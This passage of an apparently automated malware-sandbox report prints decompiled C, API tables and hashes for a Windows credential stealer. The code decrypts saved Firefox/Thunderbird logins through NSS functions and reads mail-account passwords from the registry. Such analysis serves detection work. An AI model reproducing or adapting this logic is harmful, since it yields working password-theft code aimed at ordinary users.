									E004060D0(0xff, _t96,  &_v332);
									_t196 = 0;
									goto L32;
								}
								_push( &_v3636);
								_t177 =  &_v1996;
								_push(_t177);
								L004115B2();
								if(_t177 != 0) {
									goto L32;
								}
								goto L31;
								L32:
								_v8 =  &(_v8[1]);
								_t175 = _a4;
							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
							_t226 = _t175;
						}
						goto L11;
						L34:
						if(_a8 != _t196 && _v48 != _t196) {
							_v48(_a8);
						}
						if(_v44 != _t196) {
							_v44(_v12);
						}
						goto L39;
					}
				}
			}























































                                                                        0x0040ce30
                                                                        0x0040ce38
                                                                        0x0040ce41
                                                                        0x0040ce45
                                                                        0x0040ce48
                                                                        0x0040ce4f
                                                                        0x0040d1e9
                                                                        0x0040d1e9
                                                                        0x0040d1e9
                                                                        0x0040ce55
                                                                        0x0040ce58
                                                                        0x0040ce5c
                                                                        0x0040ce6a
                                                                        0x0040ce5e
                                                                        0x0040ce65
                                                                        0x0040ce67
                                                                        0x0040ce6f
                                                                        0x0040d1d5
                                                                        0x0040d1d7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040d1dd
                                                                        0x0040d1e3
                                                                        0x00000000
                                                                        0x0040ce75
                                                                        0x0040ce7f
                                                                        0x0040ce89
                                                                        0x0040d1c9
                                                                        0x0040d1c9
                                                                        0x0040d1cc
                                                                        0x0040d1d1
                                                                        0x0040d1d3
                                                                        0x0040d1d3
                                                                        0x00000000
                                                                        0x0040ce8f
                                                                        0x0040ce9c
                                                                        0x0040ce9f
                                                                        0x0040cea6
                                                                        0x0040ceb9
                                                                        0x0040cebf
                                                                        0x0040cec4
                                                                        0x0040ced6
                                                                        0x0040cef5
                                                                        0x0040cefe
                                                                        0x0040cf0b
                                                                        0x0040cf0f
                                                                        0x0040cf13
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040cf1c
                                                                        0x0040cf1f
                                                                        0x0040cf33
                                                                        0x0040cf36
                                                                        0x0040cf36
                                                                        0x00000000
                                                                        0x0040cf39
                                                                        0x0040cf3c
                                                                        0x0040cf47
                                                                        0x0040cf3e
                                                                        0x0040cf41
                                                                        0x0040cf44
                                                                        0x0040cf4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040cf62
                                                                        0x0040cf68
                                                                        0x0040cf7a
                                                                        0x0040cf7f
                                                                        0x0040cf94
                                                                        0x0040cfa3
                                                                        0x0040cfb3
                                                                        0x0040cfc3
                                                                        0x0040cfd3
                                                                        0x0040cfe0
                                                                        0x0040cfe3
                                                                        0x0040cfed
                                                                        0x0040cff3
                                                                        0x0040cff7
                                                                        0x0040d003
                                                                        0x0040d009
                                                                        0x0040d00d
                                                                        0x0040d019
                                                                        0x0040d01f
                                                                        0x0040d023
                                                                        0x0040d02f
                                                                        0x0040d035
                                                                        0x0040d039
                                                                        0x0040d045
                                                                        0x0040d04b
                                                                        0x0040d04f
                                                                        0x0040d05b
                                                                        0x0040d061
                                                                        0x0040d070
                                                                        0x0040d076
                                                                        0x0040d084
                                                                        0x0040d08a
                                                                        0x0040d08f
                                                                        0x0040d09e
                                                                        0x0040d0af
                                                                        0x0040d0ba
                                                                        0x0040d0bd
                                                                        0x0040d0c9
                                                                        0x0040d0cc
                                                                        0x0040d0dd
                                                                        0x0040d0e7
                                                                        0x0040d0ed
                                                                        0x0040d0fb
                                                                        0x0040d101
                                                                        0x0040d106
                                                                        0x0040d106
                                                                        0x0040d119
                                                                        0x0040d12b
                                                                        0x0040d136
                                                                        0x0040d137
                                                                        0x0040d13d
                                                                        0x0040d13e
                                                                        0x0040d143
                                                                        0x0040d148
                                                                        0x0040d163
                                                                        0x0040d16a
                                                                        0x0040d175
                                                                        0x0040d181
                                                                        0x0040d187
                                                                        0x0040d18e
                                                                        0x00000000
                                                                        0x0040d18e
                                                                        0x0040d150
                                                                        0x0040d151
                                                                        0x0040d157
                                                                        0x0040d158
                                                                        0x0040d161
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040d190
                                                                        0x0040d190
                                                                        0x0040d193
                                                                        0x0040d199
                                                                        0x0040d1a5
                                                                        0x0040d1a5
                                                                        0x00000000
                                                                        0x0040d1ac
                                                                        0x0040d1af
                                                                        0x0040d1b9
                                                                        0x0040d1bc
                                                                        0x0040d1c0
                                                                        0x0040d1c5
                                                                        0x0040d1c8
                                                                        0x00000000
                                                                        0x0040d1c0
                                                                        0x0040ce89

                                                                        APIs
                                                                          • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                                          • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                          • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                          • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                                          • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                                          • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                                          • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                          • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                          • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                          • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                        • memset.MSVCRT ref: 0040CEA6
                                                                        • memset.MSVCRT ref: 0040CEBF
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,0040D314,000000FF,?,00000104,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CED6
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040CEF5
                                                                        • memset.MSVCRT ref: 0040CF68
                                                                        • memset.MSVCRT ref: 0040CF7A
                                                                        • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040CFED
                                                                        • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D003
                                                                        • strcpy.MSVCRT(?,00000000,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D019
                                                                        • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D02F
                                                                        • strcpy.MSVCRT(?,?,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D045
                                                                        • strcpy.MSVCRT(?,0040D314,0040D314,00000002,0040D314,00000005,0040D314,00000004,0040D314,00000007,0040D314,00000006,0040D314,00000001), ref: 0040D05B
                                                                        • memset.MSVCRT ref: 0040D076
                                                                        • memset.MSVCRT ref: 0040D08A
                                                                        • memset.MSVCRT ref: 0040D0ED
                                                                        • memset.MSVCRT ref: 0040D101
                                                                        • sprintf.MSVCRT ref: 0040D119
                                                                        • sprintf.MSVCRT ref: 0040D12B
                                                                        • _stricmp.MSVCRT(?,?,?,imap://%s,00000104,?,mailbox://%s,00000104,?,00000000,00000261,?,00000000,00000261,?,?), ref: 0040D13E
                                                                        • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040D158
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,?,00000000,?,0040D314,?,00000000,?,?,?), ref: 0040D1DD
                                                                        Strings
                                                                        • imap://%s, xrefs: 0040D125
                                                                        • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 0040CF2B
                                                                        • mailbox://%s, xrefs: 0040D113
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$AddressProcstrcpy$CurrentDirectory$ByteCharLibraryLoadMultiWide_stricmpsprintfstrlen$HandleModule
                                                                        • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                        • API String ID: 4276617627-3913509535
                                                                        • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                        • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                        • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                        • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040DEEE, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060D0(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062AD( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040DEA9();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                                        0x0040deee
                                                                        0x0040df08
                                                                        0x0040df0f
                                                                        0x0040df1b
                                                                        0x0040df26
                                                                        0x0040df2b
                                                                        0x0040df33
                                                                        0x0040df3e
                                                                        0x0040df4b
                                                                        0x0040df5b
                                                                        0x0040df62
                                                                        0x0040df6c
                                                                        0x0040df7f
                                                                        0x0040df88
                                                                        0x0040dfa5
                                                                        0x0040df8a
                                                                        0x0040df9c
                                                                        0x0040dfa2
                                                                        0x0040dfb3
                                                                        0x0040dfbb
                                                                        0x0040dfbd
                                                                        0x0040dfef
                                                                        0x0040e005
                                                                        0x0040e011
                                                                        0x0040e01d
                                                                        0x0040e029
                                                                        0x0040e035
                                                                        0x0040e041
                                                                        0x0040e046
                                                                        0x0040dfbf
                                                                        0x0040dfcf
                                                                        0x0040dfd3
                                                                        0x0040dfd5
                                                                        0x00000000
                                                                        0x0040dfd7
                                                                        0x0040dfd7
                                                                        0x0040dfe7
                                                                        0x0040dfeb
                                                                        0x0040dfed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040dfed
                                                                        0x0040dfd5
                                                                        0x0040dfbd
                                                                        0x0040e053

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040DF0F
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                        • memset.MSVCRT ref: 0040DF62
                                                                        • strlen.MSVCRT ref: 0040DF6C
                                                                        • strlen.MSVCRT ref: 0040DF7A
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                        • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                        • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                        • API String ID: 1296682400-4029219660
                                                                        • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                        • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                        • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                        • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00402606, Relevance: 37.6, APIs: 3, Strings: 22, Instructions: 127stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 35%
                                                                        			E00402606(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t67;
				void* _t70;
				void* _t73;
				void* _t87;
				signed int _t90;
				void* _t92;
				signed int _t96;
				intOrPtr _t100;
				intOrPtr _t101;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;
				void* _t114;

				_t114 = __fp0;
				_t92 = __ecx;
				_t103 = _t105 - 0x6c;
				_t106 = _t105 - 0x474;
				 *(_t103 + 0x4c) = "POP3 User Name";
				 *(_t103 + 0x50) = "IMAP User Name";
				 *(_t103 + 0x54) = "HTTPMail User Name";
				 *(_t103 + 0x58) = "SMTP USer Name";
				 *(_t103 + 0x1c) = "POP3 Server";
				 *(_t103 + 0x20) = "IMAP Server";
				 *(_t103 + 0x24) = "HTTPMail Server";
				 *(_t103 + 0x28) = "SMTP Server";
				 *(_t103 + 0x3c) = "POP3 Password2";
				 *(_t103 + 0x40) = "IMAP Password2";
				 *(_t103 + 0x44) = "HTTPMail Password2";
				 *(_t103 + 0x48) = "SMTP Password2";
				 *(_t103 + 0x2c) = "POP3 Port";
				 *(_t103 + 0x30) = "IMAP Port";
				 *(_t103 + 0x34) = "HTTPMail Port";
				 *(_t103 + 0x38) = "SMTP Port";
				 *(_t103 + 0x5c) = "POP3 Secure Connection";
				 *(_t103 + 0x60) = "IMAP Secure Connection";
				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
				 *(_t103 + 0x68) = "SMTP Secure Connection";
				_t90 = 0;
				do {
					 *(_t103 - 0x64) = 0;
					memset(_t103 - 0x63, 0, 0x7f);
					_push(_t103 - 0x64);
					_t96 = _t90 << 2;
					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
					_push( *((intOrPtr*)(_t103 + 0x78)));
					_t58 = 0x7f;
					_t59 = E0040EB80(_t58, _t92);
					_t106 = _t106 + 0x18;
					if(_t59 == 0) {
						E004021D8(_t103 - 0x408);
						strcpy(_t103 - 0x1f4, _t103 - 0x64);
						_t100 =  *((intOrPtr*)(_t103 + 0x78));
						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
						_t34 = _t90 + 1; // 0x1
						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
						_push(_t103 - 0x2f8);
						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
						_push(_t100);
						_t67 = 0x7f;
						E0040EB80(_t67, _t92);
						_push(_t103 - 0x3fc);
						_push("SMTP Display Name");
						_push(_t100);
						_t70 = 0x7f;
						E0040EB80(_t70, _t92);
						_push(_t103 - 0x378);
						_push("SMTP Email Address");
						_push(_t100);
						_t73 = 0x7f;
						E0040EB80(_t73, _t92);
						_t108 = _t106 + 0x2c;
						if(_t90 != 3) {
							_push(_t103 - 0x278);
							_push("SMTP Server");
							_push(_t100);
							_t87 = 0x7f;
							E0040EB80(_t87, _t92);
							_t108 = _t108 + 0xc;
						}
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
						_t106 = _t108 + 0x18;
						_t101 =  *((intOrPtr*)(_t103 + 0x74));
						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
						_pop(_t92);
						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
					}
					_t90 = _t90 + 1;
				} while (_t90 < 4);
				return _t59;
			}




















                                                                        0x00402606
                                                                        0x00402606
                                                                        0x00402607
                                                                        0x0040260b
                                                                        0x00402614
                                                                        0x0040261b
                                                                        0x00402622
                                                                        0x00402629
                                                                        0x00402630
                                                                        0x00402637
                                                                        0x0040263e
                                                                        0x00402645
                                                                        0x0040264c
                                                                        0x00402653
                                                                        0x0040265a
                                                                        0x00402661
                                                                        0x00402668
                                                                        0x0040266f
                                                                        0x00402676
                                                                        0x0040267d
                                                                        0x00402684
                                                                        0x0040268b
                                                                        0x00402692
                                                                        0x00402699
                                                                        0x004026a0
                                                                        0x004026a2
                                                                        0x004026aa
                                                                        0x004026ae
                                                                        0x004026b6
                                                                        0x004026b9
                                                                        0x004026bc
                                                                        0x004026c0
                                                                        0x004026c5
                                                                        0x004026c6
                                                                        0x004026cb
                                                                        0x004026d0
                                                                        0x004026dc
                                                                        0x004026ec
                                                                        0x004026f4
                                                                        0x004026f7
                                                                        0x004026fd
                                                                        0x00402700
                                                                        0x0040270c
                                                                        0x0040270d
                                                                        0x00402711
                                                                        0x00402714
                                                                        0x00402715
                                                                        0x00402720
                                                                        0x00402721
                                                                        0x00402726
                                                                        0x00402729
                                                                        0x0040272a
                                                                        0x00402735
                                                                        0x00402736
                                                                        0x0040273b
                                                                        0x0040273e
                                                                        0x0040273f
                                                                        0x00402744
                                                                        0x0040274a
                                                                        0x00402752
                                                                        0x00402753
                                                                        0x00402758
                                                                        0x0040275b
                                                                        0x0040275c
                                                                        0x00402761
                                                                        0x00402761
                                                                        0x0040276d
                                                                        0x0040277b
                                                                        0x00402780
                                                                        0x00402791
                                                                        0x00402796
                                                                        0x004027a9
                                                                        0x004027af
                                                                        0x004027b7
                                                                        0x004027b7
                                                                        0x004027bc
                                                                        0x004027bd
                                                                        0x004027cd

                                                                        APIs
                                                                        • memset.MSVCRT ref: 004026AE
                                                                          • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                        • strcpy.MSVCRT(?,?,?,?,?,73AFED80,?,00000000), ref: 004026EC
                                                                        • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$QueryValuememset
                                                                        • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                        • API String ID: 3373037483-1627711381
                                                                        • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                        • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                        • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                        • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F435, Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 81%
                                                                        			E0040F435(CHAR* __eax) {
				void* _v8;
				int _v12;
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void _v787;
				char _v788;
				void _v1051;
				char _v1052;
				void _v2075;
				char _v2076;
				void* __esi;
				void* _t45;
				void* _t59;
				char* _t60;
				char* _t71;
				char* _t75;
				void* _t84;
				CHAR* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t93;

				_t89 = __eax;
				_v1052 = 0;
				memset( &_v1051, 0, 0x104);
				_v788 = 0;
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					L12:
					strcpy(_t89,  &_v1052);
					if( *_t89 == 0) {
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;
				} else {
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					_v12 = 0;
					_t59 = E0040EC05(_v8, 0,  &_v268);
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;
							memset( &_v531, 0, 0x104);
							_v2076 = 0;
							memset( &_v2075, 0, 0x3ff);
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532);
									strcpy( &_v788,  &_v268);
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}



























                                                                        0x0040f449
                                                                        0x0040f453
                                                                        0x0040f459
                                                                        0x0040f46b
                                                                        0x0040f471
                                                                        0x0040f484
                                                                        0x0040f486
                                                                        0x0040f48b
                                                                        0x0040f490
                                                                        0x0040f5e6
                                                                        0x0040f5ee
                                                                        0x0040f5f7
                                                                        0x0040f600
                                                                        0x0040f60e
                                                                        0x0040f610
                                                                        0x0040f610
                                                                        0x0040f614
                                                                        0x0040f616
                                                                        0x0040f623
                                                                        0x0040f625
                                                                        0x0040f625
                                                                        0x0040f629
                                                                        0x0040f62d
                                                                        0x0040f63b
                                                                        0x0040f63d
                                                                        0x0040f63d
                                                                        0x0040f63b
                                                                        0x0040f629
                                                                        0x0040f614
                                                                        0x0040f64a
                                                                        0x0040f496
                                                                        0x0040f4a3
                                                                        0x0040f4a9
                                                                        0x0040f4b9
                                                                        0x0040f4bc
                                                                        0x0040f4c1
                                                                        0x0040f5d5
                                                                        0x0040f4c9
                                                                        0x0040f4cb
                                                                        0x0040f4d1
                                                                        0x0040f4d6
                                                                        0x0040f4d7
                                                                        0x0040f4dc
                                                                        0x0040f4e1
                                                                        0x0040f4f0
                                                                        0x0040f4f6
                                                                        0x0040f508
                                                                        0x0040f50e
                                                                        0x0040f519
                                                                        0x0040f51a
                                                                        0x0040f525
                                                                        0x0040f52a
                                                                        0x0040f52b
                                                                        0x0040f547
                                                                        0x0040f54c
                                                                        0x0040f552
                                                                        0x0040f554
                                                                        0x0040f555
                                                                        0x0040f55a
                                                                        0x0040f55f
                                                                        0x0040f561
                                                                        0x0040f561
                                                                        0x0040f569
                                                                        0x0040f581
                                                                        0x0040f582
                                                                        0x0040f589
                                                                        0x0040f591
                                                                        0x0040f592
                                                                        0x0040f5a2
                                                                        0x0040f5b5
                                                                        0x0040f5ba
                                                                        0x0040f5ba
                                                                        0x0040f592
                                                                        0x0040f569
                                                                        0x0040f5bd
                                                                        0x0040f5cd
                                                                        0x0040f5d2
                                                                        0x0040f5d2
                                                                        0x0040f5e0
                                                                        0x00000000
                                                                        0x0040f5e0

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F459
                                                                        • memset.MSVCRT ref: 0040F471
                                                                          • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                        • memset.MSVCRT ref: 0040F4A9
                                                                          • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                        • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                                        • memset.MSVCRT ref: 0040F4F6
                                                                        • memset.MSVCRT ref: 0040F50E
                                                                        • _snprintf.MSVCRT ref: 0040F52B
                                                                        • _mbsrchr.MSVCRT ref: 0040F555
                                                                        • _mbsicmp.MSVCRT ref: 0040F589
                                                                        • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                                        • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
